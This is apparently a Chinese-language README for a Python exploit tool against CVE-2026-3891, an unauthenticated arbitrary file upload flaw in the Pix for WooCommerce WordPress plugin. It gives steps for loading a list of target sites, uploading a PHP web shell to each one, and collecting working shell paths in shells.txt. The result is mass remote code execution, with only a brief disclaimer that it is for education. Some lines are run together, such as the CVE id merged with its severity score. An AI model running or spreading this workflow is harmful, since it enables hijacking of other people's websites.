Pix for WooCommerce <= 1.5.0 - 未认证的任意文件上传
WordPress 的 Pix for WooCommerce 插件存在未认证的任意文件上传漏洞,原因如下:
上述问题存在于 1.5.0 及以下所有版本的 lkn_pix_for_woocommerce_c6_save_settings 函数中。
这允许远程未认证攻击者上传任意文件,从而导致远程代码执行 (RCE)。
CVE-2026-38919.8 (Critical)CVE-2026-3891.py@Kxploitpip install requests rich
创建文件:
list.txt
示例:
http://example.com
https://target.com
victim-site.com
如果缺少协议 → 脚本会自动添加
http://
将你的 shell 文件放在同一目录下:
shell.php
python3 CVE-2026-3891.py
脚本会询问:
list.txt)8)shell.php)/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/<shell>.php
FAIL http://target.com (reason)
shells.txt
Progress 5/20 OK:3 FAIL:2
本项目仅供教育和授权安全测试使用。
Nxploited